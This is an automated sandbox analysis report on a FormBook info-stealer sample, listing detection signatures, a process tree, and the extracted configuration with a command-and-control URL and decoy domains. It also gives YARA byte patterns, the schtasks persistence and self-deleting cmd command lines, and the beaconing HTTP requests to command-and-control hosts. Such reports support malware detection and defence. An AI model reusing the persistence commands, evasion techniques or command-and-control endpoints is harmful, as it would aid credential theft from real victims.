
Analysis Report PO_210223.exe

Overview

General Information

Sample Name: PO_210223.exe
Analysis ID: 356494
MD5: e40af9745e938b72d5d860bbc679aebf
SHA1: d9e750061417b0ca9f933db79c99c12934abbe84
SHA256: 38acc90cd6d33b61b99cca8cf06781e1bd2ab8ffebc3a33e036eca36037d413b
Tags: exe, Formbook, geoKOR

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO_210223.exe (PID: 6976 cmdline: 'C:\Users\user\Desktop\PO_210223.exe' MD5: E40AF9745E938B72D5D860BBC679AEBF)
    • schtasks.exe (PID: 1556 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 1744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • PO_210223.exe (PID: 1868 cmdline: C:\Users\user\Desktop\PO_210223.exe MD5: E40AF9745E938B72D5D860BBC679AEBF)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6744 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 7112 cmdline: /c del 'C:\Users\user\Desktop\PO_210223.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.000666dy.com/ntg/"], "decoy": ["successwithyolandafgreen.com", "theordinaryph.com", "atamyo-therapeutics.com", "pophazard.com", "anthonyfultz.com", "pasanglham.com", "kanekhushi.com", "littlefishyswim.com", "kaieteurny.com", "fanavartima.com", "digexpo.com", "se-rto.com", "chaos.finance", "bakldx.com", "after-school.pro", "faithfromphilly.com", "estudiomuradian.com", "albertocerasini.com", "andronna.com", "wingspotusa.com", "lucky-lucky.online", "ga-don.com", "shawnbly.com", "shoptalullah.com", "needfulvegan.com", "ampersandaconsulting.com", "hoyhelp.com", "wickfordinternists.com", "kindlovingmindfulyoga.com", "hhkgjt.net", "eventpubgpharaoh.com", "blameitonpizza.com", "editshirt.com", "utulocal194.com", "meralpro.com", "rochesterhindus.com", "wadihassafi.com", "visitouroffice.com", "duncantraining.com", "ggrealestategroup.com", "xrf-tech.com", "pro-tizer.com", "usesoft.icu", "caralsalem.com", "inudaipur.com", "fluid-branding.com", "titizadiyamancigkofte.com", "es-tucasa.com", "103manningave.com", "eclat-beauty.info", "ahameeting2021.com", "gsyxh.com", "246835.com", "onwardfpv.com", "estasinvitado.net", "kinderkakery.com", "bala5.com", "gehqaralouine.com", "editorialesrd.com", "thebarconcepts.com", "aleitzeventdecor.com", "moderaty.com", "geraloqaresuine.com", "kyotodreaming.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.PO_210223.exe.2cb671c.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
0.2.PO_210223.exe.45c8e00.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.PO_210223.exe.45c8e00.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0xe6998:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xe6c02:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x112fb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x113222:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xf2725:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x11ed45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0xf2211:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x11e831:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0xf2827:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x11ee47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0xf299f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x11efbf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xe761a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x113c3a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0xf148c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x11daac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xe8313:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x114933:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0xf83c7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1249e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xf93ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.PO_210223.exe.45c8e00.3.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0xf54a9:$sqlite3step: 68 34 1C 7B E1
  • 0xf55bc:$sqlite3step: 68 34 1C 7B E1
  • 0x121ac9:$sqlite3step: 68 34 1C 7B E1
  • 0x121bdc:$sqlite3step: 68 34 1C 7B E1
  • 0xf54d8:$sqlite3text: 68 38 2A 90 C5
  • 0xf55fd:$sqlite3text: 68 38 2A 90 C5
  • 0x121af8:$sqlite3text: 68 38 2A 90 C5
  • 0x121c1d:$sqlite3text: 68 38 2A 90 C5
  • 0xf54eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0xf5613:$sqlite3blob: 68 53 D8 7F 8C
  • 0x121b0b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x121c33:$sqlite3blob: 68 53 D8 7F 8C
9.2.PO_210223.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\PO_210223.exe', ParentImage: C:\Users\user\Desktop\PO_210223.exe, ParentProcessId: 6976, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp', ProcessId: 1556

Signature Overview

AV Detection:

Found malware configuration
Source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack | Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\kwqifureL.exe | ReversingLabs: Detection: 42%
Multi AV Scanner detection for submitted file
Source: PO_210223.exe | Virustotal: Detection: 31%
Source: PO_210223.exe | ReversingLabs: Detection: 42%
Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\kwqifureL.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: PO_210223.exe | Joe Sandbox ML: detected
Source: 9.2.PO_210223.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\PO_210223.exe | Unpacked PE file: 0.2.PO_210223.exe.890000.0.unpack
Uses 32bit PE files
Source: PO_210223.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: PO_210223.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: ipconfig.pdb | source: PO_210223.exe, 00000009.00000002.715896040.00000000016E0000.00000040.00000001.sdmp
Source: Binary string: ipconfig.pdbGCTL | source: PO_210223.exe, 00000009.00000002.715896040.00000000016E0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 0000000A.00000000.691413999.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: PO_210223.exe, 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, ipconfig.exe, 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: PO_210223.exe, ipconfig.exe
Source: Binary string: wscui.pdb | source: explorer.exe, 0000000A.00000000.691413999.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\PO_210223.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.000666dy.com/ntg/
Source: global traffic | HTTP traffic detected: GET /ntg/?ojoHzZ=ezEzfTUVqdhTeHhhSUO1nROjhCSdyq2ILgetv621tco9QxJ0Ek6h+l0QSU1+LT7ErdbR&1bm=GPD0lNKPfFHTAb HTTP/1.1, Host: www.pophazard.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ntg/?ojoHzZ=w4X+hAUHJfroJmp94c1onPOAPenZZpTxtRzXhSWsn9e2URXOAMjiMifVYC4X6954J+Dz&1bm=GPD0lNKPfFHTAb HTTP/1.1, Host: www.246835.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ntg/?ojoHzZ=bxqEOtZwpu8QOdqfa5M05y7zdw+lGZ3K+8kzjODwarG6Nc6O9nhCMo5PAGRXJYSnY3HU&1bm=GPD0lNKPfFHTAb HTTP/1.1, Host: www.kaieteurny.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: Joe Sandbox View | IP Address: 204.11.56.48
Source: Joe Sandbox View | ASN Name: CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View | ASN Name: CNSERVERSUS
Source: C:\Windows\explorer.exe | Code function: 10_2_04E0E782 getaddrinfo,setsockopt,recv,
Source: unknown | DNS traffic detected: queries for: www.pophazard.com
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, PO_210223.exe, 00000000.00000003.646155016.000000000826B000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/arrow.png)
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libg.png)
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libgh.png)
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/logo.png)
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)
Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000A.00000002.910436982.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com
Source: PO_210223.exe, 00000000.00000003.648075554.000000000828D000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comcy
Source: PO_210223.exe, 00000000.00000003.648155639.000000000828D000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comig
Source: PO_210223.exe, 00000000.00000003.648075554.000000000828D000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comint
Source: PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comk
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comva9y
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: PO_210223.exe, 00000000.00000003.652634958.0000000008285000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: PO_210223.exe, 00000000.00000003.658952636.0000000008285000.00000004.00000001.sdmp, PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: PO_210223.exe, 00000000.00000003.654377069.0000000008285000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersQ
Source: PO_210223.exe, 00000000.00000003.658906996.0000000008285000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designerse
Source: PO_210223.exe, 00000000.00000003.658952636.0000000008285000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersiva
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: PO_210223.exe, 00000000.00000003.645891455.000000000826B000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comc
Source: PO_210223.exe, 00000000.00000003.645842271.000000000826B000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comic
Source: PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: PO_210223.exe, 00000000.00000003.647493837.0000000008252000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PO_210223.exe, 00000000.00000003.647755183.0000000008255000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnal
Source: PO_210223.exe, 00000000.00000003.647493837.0000000008252000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnal9y
Source: PO_210223.exe, 00000000.00000003.647129278.0000000008256000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnt7o
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PO_210223.exe, 00000000.00000003.655856986.0000000008285000.00000004.00000001.sdmp, PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: PO_210223.exe, 00000000.00000003.658733903.0000000008285000.00000004.00000001.sdmp | String found in binary or memory: http://www.monotype.
Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmp | String found in binary or memory: http://www.pophazard.com/sk-logabpstatus.php?a=aG42QXdLZEpxVDR5Y2RqNUtBbnIvaUNNaWJVdEVQVjlJMUxVR2dwW
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: PO_210223.exe, 00000000.00000003.649005992.0000000008252000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com8i
Source: PO_210223.exe, 00000000.00000003.646155016.000000000826B000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comal
Source: PO_210223.exe, 00000000.00000003.646155016.000000000826B000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comh
Source: PO_210223.exe, 00000000.00000003.649005992.0000000008252000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comlic
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
